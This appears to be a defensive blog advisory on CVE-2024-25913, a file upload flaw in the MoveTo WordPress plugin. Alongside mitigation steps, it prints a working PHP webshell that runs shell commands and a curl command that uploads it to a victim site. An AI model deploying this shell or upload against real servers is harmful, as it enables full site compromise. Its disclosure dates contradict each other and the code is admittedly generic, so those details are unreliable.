CVE-2024-25913 - Unrestricted File Upload Vulnerability in Skymoonlabs MoveTo — What You Need to Know

In March 2024, a critical vulnerability was disclosed in the Skymoonlabs MoveTo plugin, a popular WordPress plugin used to create smooth-scrolling navigation on websites. This vulnerability, tracked as CVE-2024-25913, allows attackers to upload malicious files to the server. The potential impact is severe, including complete website compromise. In this article, we’ll break down what this means, how the exploit works, and what to do next to protect your website.

What Is CVE-2024-25913?

CVE-2024-25913 is an *"Unrestricted Upload of File with Dangerous Type"* vulnerability. In plain English, this means the plugin doesn't properly check files users upload, so attackers can upload dangerous files — for example, PHP scripts — which then can be executed on the server.

Fixed in: No official fix as of June 2024

- Plugin URL: https://wordpress.org/plugins/moveto/

How Does the Vulnerability Work?

Inside the plugin, there is an endpoint (usually a PHP file) that handles uploads for features like image icons or file attachments. The code fails to restrict the filetypes or to check if files are really images. An attacker can upload a webshell (a script that gives remote control) or other executable files.

Vulnerable Code Example

Here’s the kind of insecure code you might find in the plugin. (This is a generic snippet for clarity):

if (isset($_FILES['file'])) {
    $upload_dir = __DIR__ . '/uploads/';
    $filename = basename($_FILES['file']['name']);
    move_uploaded_file($_FILES['file']['tmp_name'], $upload_dir . $filename);
    echo "File uploaded!";
}

If an attacker uploads a PHP script, it could look like this

<?php
if(isset($_REQUEST['cmd'])){
    echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>

After upload, navigating to https://victim-site.com/wp-content/plugins/moveto/uploads/shell.php?cmd=whoami gives the attacker full command execution on the server.

Find the Upload Form or Endpoint:

- Usually something like /wp-content/plugins/moveto/upload.php

Example Curl Command

curl -F "file=@shell.php" https://victim-site.com/wp-content/plugins/moveto/upload.php

References and Official Reports

- Original CVE Entry — CVE-2024-25913
- WordPress Plugin Page
- OWASP — Unrestricted File Upload

Disable the Plugin Immediately: Deactivate MoveTo until a patched version is released.

2. Check for Suspicious Files: Look in your /wp-content/plugins/moveto/ folder, especially for .php files in /uploads/ directories.

Contact Skymoonlabs Support: Report the issue if not already known.

4. Follow Updates: Keep an eye on the plugin page for security updates.

A basic check before moving files could look like

$allowed_types = ['image/jpeg', 'image/png', 'image/gif'];
if (in_array($_FILES['file']['type'], $allowed_types)) {
    // Proceed with upload
} else {
    echo "Invalid file type!";
}

And prevent execution of uploaded files

# .htaccess in uploads directory
<Files *.php>
  deny from all
</Files>

Conclusion

CVE-2024-25913 is a dangerous flaw in the Skymoonlabs MoveTo plugin, giving hackers the keys to your website through a simple file upload. If you’re running MoveTo, take action NOW — disable the plugin, check your files, and watch for updates.

Stay safe, and always keep your plugins updated!

*This article is an exclusive, simplified breakdown based on public CVE information and best practices. For further technical details, check the CVE database or consult a security professional.*

Timeline

Published on: 02/26/2024 16:27:59 UTC
Last modified on: 02/26/2024 16:32:25 UTC